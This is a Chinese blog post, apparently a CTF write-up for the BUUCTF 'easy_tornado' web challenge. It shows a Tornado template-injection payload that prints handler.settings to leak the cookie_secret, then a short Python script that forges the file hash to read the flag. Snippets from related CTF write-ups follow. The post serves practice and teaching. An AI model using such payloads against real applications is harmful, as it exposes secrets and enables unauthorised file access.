BUU-WEB-easy_tornado

最新推荐文章于 2022-07-04 10:07:03 发布
最新推荐文章于 2022-07-04 10:07:03 发布
阅读量159 收藏 2
点赞数
分类专栏: BMZCTF-web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116458482
版权

模板注入 MD5 Web安全 加密 漏洞利用
关键词由CSDN通过智能技术生成

BUU-WEB-easy_tornado

查看主页的提示内容。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
同时发现url的构成是filename和filehash构成。filename已经知道了,现在就剩下cookie_secret不知道了。
尝试不通过filehash访问/fllllllllllllag文件。
但是似乎报错了。
在这里插入图片描述
而且url也变得不一样了。
(查看别的大佬的wp发现原来是模板注入),通过报错的页面构建payload

buuoj.cn/error?msg={{handler.settings}}

就可以看见cookie_secret
在这里插入图片描述
剩下就将MD5加密。

import hashlib

def md5(s):
    md5 = hashlib.md5()
    md5.update(s)
    return md5.hexdigest()


def filehash():
    filename = '/fllllllllllllag'
    cookie_secret = 'dd8382b3-c8d2-45a7-8347-268211072aa9'
    print(md5(cookie_secret + md5(filename)))


if __name__ == '__main__':
    filehash()

构建相应的url即可看到flag。
在这里插入图片描述

TzZzEZ-web
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
护网杯部分题目题解
0verWatch的博客
10-14 4342
前言 护网杯的这次比赛还是很有收获的,至少在web方面我认为是这样的,还是得继续努力吧。。。 正文 MISC 迟来的签到 AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs= 题目说要异或,那就直接爆破异或就好 写个小脚本就可以得到flag import base64 a = "AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJV...
攻防世界 web进阶 easytornado 【模板注入】
Hrain7的博客
11-24 722
分别点开三个文件 /flag.txt 由此可知,flag在 /fllllllllllllag 里面 /welcome.txt 发现render函数,百度一下,render是一个渲染函数,渲染变量到模板中,模板嘿嘿嘿,猜想可能存在模板注入吧,我所知道就这些请见谅。。。。 render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 render配合Tornado使用。 /hints.txt md5(cookie_secret+md5(...
攻防世界web高手进阶区(二)
weixin_44866139的博客
03-17 582
supersqli 题目提示随便住,输入1’题目报错说多了一个分号,存在sql注入 输入1’#,返回正确 1’ order by 2# 1’ order by 3#,返回错误,说明有两列 联合查询,发现select字段被过滤了 当关键字被过滤时可以尝试堆叠注入 方法一:堆叠注入 -1’;show tables#,–+好像被过滤了 1、查看字段 -1’;show columns from 1919...
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 432
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
BUUCTF涨见识之旅(一)
qq_46041723的博客
10-12 345
buuctf前言easy_tornadoinclude补充file://协议php://协议php://filter协议php://input协议zip://协议compress.bzip2://compress.zlib://data:// 前言 经过几周的联系,感觉自己可以接触buuctf上面的题了,就去尝试了一下,结果可真的是让我涨了好多见识啊! 卑微.jpg easy_tornado 刚打开题目环境,发现了三个文件 依次打开发现 接着发现url框里的get内容http://db2df9d1-
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 967
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1532
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUUCTF------mrctf2020_easyoverflow
qq_33010875的博客
10-08 345
环境:WSL2,ubuntu16.04,python2 checksec文件: 拖入ida分析: main函数中就有system(‘bin/sh’),只要check函数的返回值为1即可执行 查看check函数: 只要a1和fake_flag相等,函数就能返回1 a1就是main函数里的v5,值为:ju3t_@_f@k3_f1@g fake_flag的值为:n0t_r3@11y_f1@g 只要将v5的值覆盖为n0t_r3@11y_f1@g即可 main函数中有get函数可用, v4: v4是var_
buu-[CFI-CTF 2018]IntroToPE
qaq517384的博客
04-10 376
解压为一个NET文件 程序为一个检验密码的程序 dnSpy打开,根据按钮搜索相关函数 过一遍发现 Q0ZJey5OZXRDI18xc19AdzNzMG0zfQ== base64解密即可 flag{.NetC#_1s_@w3s0m3}
攻防世界web高阶3分题(easytornado
qq_45791542的博客
08-01 318
读题 PS: tornado 查资料发现 Tornado (python的web框架) 打开题目发现三个文件 第一个文件 说明flag应该是在fllllllllllllag文件中 再进入第二个文件 进入第三个文件 发现提示md5(cookie_secret + md5(filename)),即先将filenamemd5加密,再将cookie_secret与md5加密后的filename进行md5加密,也就是说,目前我们需要知道的是filename和cookie_secret 测试
CTF刷题01
Atkx's Blog
09-20 699
1. 2. 3. 4. 转轮机加密 题目描述:你俩继续往前走,来到了前面的下一个关卡,这个铺面墙上写了好多奇奇怪怪的 英文字母,排列的的整整齐齐,店面前面还有一个大大的类似于土耳其旋转烤肉的架子,上面一圈圈的 也刻着很多英文字母,你是一个小历史迷,对于二战时候的历史刚好特别熟悉,一拍大腿:“嗨呀!我知道 是什么东西了!”。提示:托马斯·杰斐逊。 flag,是字符串,小写。 下载附件 按照密钥顺序排列 再按照密文提示的字母进行反转 再将大写转换成小写即为flag 5. give_you_flag 题目描
errorHandler
jasonvip_c的专栏
03-23 2890
using System;using System.Collections.Generic;using System.Linq;using System.Web;using System.Web.UI;using System.Web.UI.WebControls;namespace kirin{    public partial class _Default : System.Web.UI
BUUCT-WEB-easy_tornado
迷风小白
07-02 7573
easy_tornado tornado是python中的一个web应用框架。 拿到题目发现有三个文件 flag.txt /flag.txt flag in /fllllllllllllag 发现flag在/fllllllllllllag文件里 welcome.txt /welcome.txt render render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形...
漏洞复现-easy_tornado
qq_59350385的博客
07-04 287
windowsFirefoxtornado是python中的一个web应用框架。拿到题目发现有三个文件:flag.txt 发现flag在/fllllllllllllag文件里;welcome.txt render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txt filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的
2020 太湖杯 misc
末初的CSDN博客
11-12 1338
伪加密 omisc.docx 希尔密码 waoootu.epj,nv o www.verymuch.net http://www.atoolbox.net/Tool.php?Id=914 love and peaceee Rabbit解密 base32解码 Unicode解码 新佛曰解码 http://hi.pcmoe.net/buddha.html Live beautifully, dream passionately, love completely. 得到压缩包密码解压fun.
白帽子社区训练场(ctf)wp(一)-- misc
小衎的博客
01-14 1199
最近打算研究web漏洞挖掘,现在想挖洞太难了,而且对于php大概能看懂,学的不够啊,看到有个白帽子社区,进去看看…有做题的先做做看看吧!因此这两天吧misc题做完,现在也算是梳理总结吧。 1. 就是一张图片 下载图片直接用编辑器打开,可以看到,图片最后被加了flag 2. a beautiful girl 下载图片,flag直接在图片上……这也太简单了……(就不帖图了) 3. 二维码 下载附件,...
[BMZCTF]-hitcon_2017_ssrfme
cjdgg的博客
05-23 173
[BMZCTF]-hitcon_2017_ssrfme 依旧是直接给出题目源代码 这里列一下几个用到的函数吧 file_put_contents — 将一个字符串写入文件 pathinfo — 返回文件路径的信息 escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 这题代码简而言之就是会先生成一个文件夹,路径是orange+你的ip地址经过MD5加密后的密文,所以实际位置就是
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值